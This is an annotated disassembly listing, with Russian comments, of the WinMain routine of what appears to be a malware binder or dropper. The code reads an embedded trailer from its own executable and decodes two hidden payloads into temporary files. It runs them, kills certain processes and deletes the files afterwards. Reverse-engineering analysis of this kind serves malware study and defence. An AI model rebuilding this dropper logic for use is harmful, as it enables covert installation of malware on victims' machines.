.text:0040160C .text:0040160C ; --------------- S U B R O U T I N E --------------------------------------- .text:0040160C .text:0040160C ; Attributes: bp-based frame .text:0040160C .text:0040160C ; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd) .text:0040160C _WinMain@16 proc near ; CODE XREF: start+12Fp .text:0040160C .text:0040160C Filename = byte ptr -534h .text:0040160C var_430 = byte ptr -430h .text:0040160C var_32C = byte ptr -32Ch .text:0040160C FileName = byte ptr -228h .text:0040160C Buffer = byte ptr -124h .text:0040160C var_20 = dword ptr -20h .text:0040160C var_1C = dword ptr -1Ch .text:0040160C var_18 = dword ptr -18h .text:0040160C var_14 = word ptr -14h .text:0040160C var_12 = dword ptr -12h .text:0040160C var_D = dword ptr -0Dh .text:0040160C var_8 = dword ptr -8 .text:0040160C var_4 = dword ptr -4 .text:0040160C hModule = dword ptr 8 .text:0040160C hPrevInstance = dword ptr 0Ch .text:0040160C lpCmdLine = dword ptr 10h .text:0040160C nShowCmd = dword ptr 14h .text:0040160C .text:0040160C push ebp .text:0040160D mov ebp, esp .text:0040160F sub esp, 534h .text:00401615 push esi .text:00401616 mov esi, 104h .text:0040161B push edi .text:0040161C lea eax, [ebp+Filename] .text:00401622 push esi ; nSize .text:00401623 push eax ; lpFilename .text:00401624 push [ebp+hModule] ; hModule .text:00401627 call ds:GetModuleFileNameA ; GetModuleFileName(hModule,lpFilename,nSize) - .text:00401627 ; получение имени собственного EXE в Filename .text:00401627 ; .text:0040162D lea eax, [ebp+Filename] .text:00401633 push offset aRb ; "rb" .text:00401638 push eax ; char * .text:00401639 call fopen .text:0040163E mov edi, eax ; edi=fopen(lpFilename,"rb") - .text:0040163E ; открываем собственный EXE для чтения .text:0040163E ; дескриптор в edi .text:0040163E ; .text:00401640 push 2 ; int .text:00401642 push 0FFFFFFE8h ; __int32 .text:00401644 push edi ; FILE * .text:00401645 call fseek ; fseek(edi,-18h,SEEK_END) - .text:00401645 ; перемещаемся на 18h-ый байт с конца собственного EXE .text:00401645 ; .text:0040164A push edi ; FILE * .text:0040164B push 1 ; size_t .text:0040164D lea eax, [ebp+var_20] .text:00401650 push 18h ; size_t .text:00401652 push eax ; void * .text:00401653 call fread ; fread(var_20,18h,1,edi) - .text:00401653 ; читаем 18h байт с конца собственого EXE .text:00401653 ; в буфер var_20 .text:00401658 movsx eax, [ebp+var_14] .text:0040165C add esp, 24h .text:0040165F dec eax .text:00401660 jz short loc_401698 .text:00401662 dec eax .text:00401663 jz short loc_401688 .text:00401665 dec eax .text:00401666 jz short loc_401678 .text:00401668 lea eax, [ebp+Buffer] ; .text:00401668 ; .text:0040166E push eax ; lpBuffer .text:0040166F push esi ; nBufferLength .text:00401670 call ds:GetCurrentDirectoryA .text:00401676 jmp short loc_4016A6 ; buffer = текущая папка .text:00401676 ; .text:00401678 ; --------------------------------------------------------------------------- .text:00401678 .text:00401678 loc_401678: ; CODE XREF: WinMain(x,x,x,x)+5Aj .text:00401678 lea eax, [ebp+Buffer] .text:0040167E push esi ; uSize .text:0040167F push eax ; lpBuffer .text:00401680 call ds:GetWindowsDirectoryA .text:00401686 jmp short loc_4016A6 ; buffer = папка Windows .text:00401686 ; .text:00401688 ; --------------------------------------------------------------------------- .text:00401688 .text:00401688 loc_401688: ; CODE XREF: WinMain(x,x,x,x)+57j .text:00401688 lea eax, [ebp+Buffer] .text:0040168E push esi ; uSize .text:0040168F push eax ; lpBuffer .text:00401690 call ds:GetSystemDirectoryA .text:00401696 jmp short loc_4016A6 ; buffer = системная папка .text:00401696 ; .text:00401698 ; --------------------------------------------------------------------------- .text:00401698 .text:00401698 loc_401698: ; CODE XREF: WinMain(x,x,x,x)+54j .text:00401698 lea eax, [ebp+Buffer] .text:0040169E push eax ; lpBuffer .text:0040169F push esi ; nBufferLength .text:004016A0 call ds:GetTempPathA ; buffer = временная папка .text:004016A6 .text:004016A6 loc_4016A6: ; CODE XREF: WinMain(x,x,x,x)+6Aj .text:004016A6 ; WinMain(x,x,x,x)+7Aj ... .text:004016A6 lea eax, [ebp+var_430] .text:004016AC push ebx .text:004016AD push eax ; char * .text:004016AE call tmpnam ; случайное "временное" имя в var_430 .text:004016AE ; .text:004016B3 lea eax, [ebp+var_12] .text:004016B6 mov esi, ds:wsprintfA .text:004016BC push eax .text:004016BD lea eax, [ebp+var_430] .text:004016C3 push eax .text:004016C4 lea eax, [ebp+Buffer] .text:004016CA push eax .text:004016CB mov ebx, offset aSSS ; "%s%s%s" .text:004016D0 lea eax, [ebp+FileName] .text:004016D6 push ebx ; LPCSTR .text:004016D7 push eax ; LPSTR .text:004016D8 call esi ; wsprintfA ; wsprintf(Filename,"%s%s%s",Buffer,var_430,var_12) .text:004016D8 ; Filename=Buffer+var_430+var_12 .text:004016DA lea eax, [ebp+var_430] .text:004016E0 push eax ; char * .text:004016E1 call tmpnam ; случайное "веременное" имя в var_430 .text:004016E1 ; .text:004016E6 lea eax, [ebp+var_D] .text:004016E9 push eax .text:004016EA lea eax, [ebp+var_430] .text:004016F0 push eax .text:004016F1 lea eax, [ebp+Buffer] .text:004016F7 push eax .text:004016F8 lea eax, [ebp+var_32C] .text:004016FE push ebx ; LPCSTR .text:004016FF push eax ; LPSTR .text:00401700 call esi ; wsprintfA ; var_32C=Buffer+var430+var_D .text:00401700 ; .text:00401702 push 4 .text:00401704 push [ebp+var_18] .text:00401707 call sub_4015F8 ; ?? .text:0040170C add esp, 38h .text:0040170F test eax, eax .text:00401711 jz short loc_401718 .text:00401713 call sub_401488 ; KillProcess1 .text:00401718 .text:00401718 loc_401718: ; CODE XREF: WinMain(x,x,x,x)+105j .text:00401718 push 5 .text:0040171A push [ebp+var_18] .text:0040171D call sub_4015F8 ; ?? .text:00401722 pop ecx .text:00401723 test eax, eax .text:00401725 pop ecx .text:00401726 jz short loc_40172D .text:00401728 call sub_401540 ; KillProcess2 .text:0040172D .text:0040172D loc_40172D: ; CODE XREF: WinMain(x,x,x,x)+11Aj .text:0040172D mov esi, offset aWb ; "wb" .text:00401732 lea eax, [ebp+FileName] .text:00401738 push esi ; char * .text:00401739 push eax ; char * .text:0040173A call fopen .text:0040173F mov [ebp+var_8], eax ; var_8=fopen(Filename,"wb"); - .text:0040173F ; открытие временного файла для записи .text:0040173F ; .text:00401742 lea eax, [ebp+var_32C] .text:00401748 push esi ; char * .text:00401749 push eax ; char * .text:0040174A call fopen .text:0040174F push 2 .text:00401751 mov [ebp+var_4], eax ; var_4=fopen(var_32C,"wb") .text:00401751 ; открытие временного файла для записи .text:00401751 ; .text:00401754 push [ebp+var_18] .text:00401757 xor ebx, ebx .text:00401759 xor esi, esi .text:0040175B call sub_4015F8 ; ?? .text:00401760 push 2 ; int .text:00401762 push 0FFFFFFE8h .text:00401764 mov [ebp+hModule], eax .text:00401767 pop eax .text:00401768 sub eax, [ebp+var_1C] .text:0040176B sub eax, [ebp+var_20] .text:0040176E push eax ; __int32 .text:0040176F push edi ; FILE * .text:00401770 call fseek .text:00401775 add esp, 24h .text:00401778 .text:00401778 loc_401778: ; CODE XREF: WinMain(x,x,x,x)+188j .text:00401778 push edi ; Decrypt1 .text:00401779 call fgetc .text:0040177E push [ebp+var_8] ; FILE * .text:00401781 movsx eax, al .text:00401784 sub eax, [ebp+hModule] .text:00401787 push eax ; int .text:00401788 call fputc .text:0040178D add esp, 0Ch .text:00401790 inc esi .text:00401791 cmp esi, [ebp+var_20] .text:00401794 jl short loc_401778 .text:00401796 push 2 ; int .text:00401798 push 0FFFFFFE8h .text:0040179A pop eax .text:0040179B sub eax, [ebp+var_1C] .text:0040179E push eax ; __int32 .text:0040179F push edi ; FILE * .text:004017A0 call fseek .text:004017A5 add esp, 0Ch .text:004017A8 xor esi, esi .text:004017AA .text:004017AA loc_4017AA: ; CODE XREF: WinMain(x,x,x,x)+1BAj .text:004017AA push edi ; Decrypt2 .text:004017AB call fgetc .text:004017B0 push [ebp+var_4] ; FILE * .text:004017B3 movsx eax, al .text:004017B6 sub eax, [ebp+hModule] .text:004017B9 push eax ; int .text:004017BA call fputc .text:004017BF add esp, 0Ch .text:004017C2 inc esi .text:004017C3 cmp esi, [ebp+var_1C] .text:004017C6 jl short loc_4017AA .text:004017C8 push [ebp+var_8] ; FILE * .text:004017CB call fclose .text:004017D0 push [ebp+var_4] ; FILE * .text:004017D3 call fclose .text:004017D8 push edi ; FILE * .text:004017D9 call fclose .text:004017DE push ebx .text:004017DF push [ebp+var_18] .text:004017E2 call sub_4015F8 .text:004017E7 mov esi, ds:ShellExecuteA ; Opens or prints a specified file .text:004017ED add esp, 14h .text:004017F0 test eax, eax .text:004017F2 jz short loc_401803 .text:004017F4 push 0Ah ; nShowCmd .text:004017F6 push ebx ; lpDirectory .text:004017F7 lea eax, [ebp+FileName] .text:004017FD push ebx ; lpParameters .text:004017FE push eax ; lpFile .text:004017FF push ebx ; lpOperation .text:00401800 push ebx ; hwnd .text:00401801 call esi ; ShellExecuteA ; запускаем FileName .text:00401803 .text:00401803 loc_401803: ; CODE XREF: WinMain(x,x,x,x)+1E6j .text:00401803 push 1 .text:00401805 push [ebp+var_18] .text:00401808 call sub_4015F8 .text:0040180D pop ecx .text:0040180E test eax, eax .text:00401810 pop ecx .text:00401811 jz short loc_401822 .text:00401813 push 0Ah ; nShowCmd .text:00401815 push ebx ; lpDirectory .text:00401816 lea eax, [ebp+var_32C] .text:0040181C push ebx ; lpParameters .text:0040181D push eax ; lpFile .text:0040181E push ebx ; lpOperation .text:0040181F push ebx ; hwnd .text:00401820 call esi ; ShellExecuteA ; запускаем var_32C .text:00401822 .text:00401822 loc_401822: ; CODE XREF: WinMain(x,x,x,x)+205j .text:00401822 push 1388h ; dwMilliseconds .text:00401827 call ds:Sleep .text:0040182D push 3 .text:0040182F push [ebp+var_18] .text:00401832 call sub_4015F8 .text:00401837 mov esi, ds:DeleteFileA .text:0040183D pop ecx .text:0040183E pop ecx .text:0040183F pop ebx .text:00401840 test eax, eax .text:00401842 jz short loc_40184D .text:00401844 lea eax, [ebp+FileName] .text:0040184A push eax ; lpFileName .text:0040184B call esi ; DeleteFileA ; удаляем временный файл FileName .text:0040184D .text:0040184D loc_40184D: ; CODE XREF: WinMain(x,x,x,x)+236j .text:0040184D push 3 .text:0040184F push [ebp+var_18] .text:00401852 call sub_4015F8 .text:00401857 pop ecx .text:00401858 test eax, eax .text:0040185A pop ecx .text:0040185B jz short loc_401866 .text:0040185D lea eax, [ebp+var_32C] .text:00401863 push eax ; lpFileName .text:00401864 call esi ; DeleteFileA ; удаляем временный файл var_32C .text:00401866 .text:00401866 loc_401866: ; CODE XREF: WinMain(x,x,x,x)+24Fj .text:00401866 pop edi .text:00401867 xor eax, eax .text:00401869 pop esi .text:0040186A leave .text:0040186B retn 10h .text:0040186B _WinMain@16 endp .text:0040186B .text:0040186E ; [00000006 BYTES: COLLAPSED FUNCTION Process32Next. PRESS KEYPAD "+" TO EXPAND] .text:00401874 ; [00000006 BYTES: COLLAPSED FUNCTION Process32First. PRESS KEYPAD "+" TO EXPAND] .text:0040187A ; [00000006 BYTES: COLLAPSED FUNCTION CreateToolhelp32Snapshot. PRESS KEYPAD "+" TO EXPAND] .text:00401880 ; [00000006 BYTES: COLLAPSED FUNCTION strstr. PRESS KEYPAD "+" TO EXPAND] .text:00401886 ; [00000006 BYTES: COLLAPSED FUNCTION fclose. PRESS KEYPAD "+" TO EXPAND] .text:0040188C ; [00000006 BYTES: COLLAPSED FUNCTION fputc. PRESS KEYPAD "+" TO EXPAND] .text:00401892 ; [00000006 BYTES: COLLAPSED FUNCTION fgetc. PRESS KEYPAD "+" TO EXPAND] .text:00401898 ; [00000006 BYTES: COLLAPSED FUNCTION tmpnam. PRESS KEYPAD "+" TO EXPAND] .text:0040189E ; [00000006 BYTES: COLLAPSED FUNCTION fread. PRESS KEYPAD "+" TO EXPAND] .text:004018A4 ; [00000006 BYTES: COLLAPSED FUNCTION fseek. PRESS KEYPAD "+" TO EXPAND] .text:004018AA ; [00000006 BYTES: COLLAPSED FUNCTION fopen. PRESS KEYPAD "+" TO EXPAND]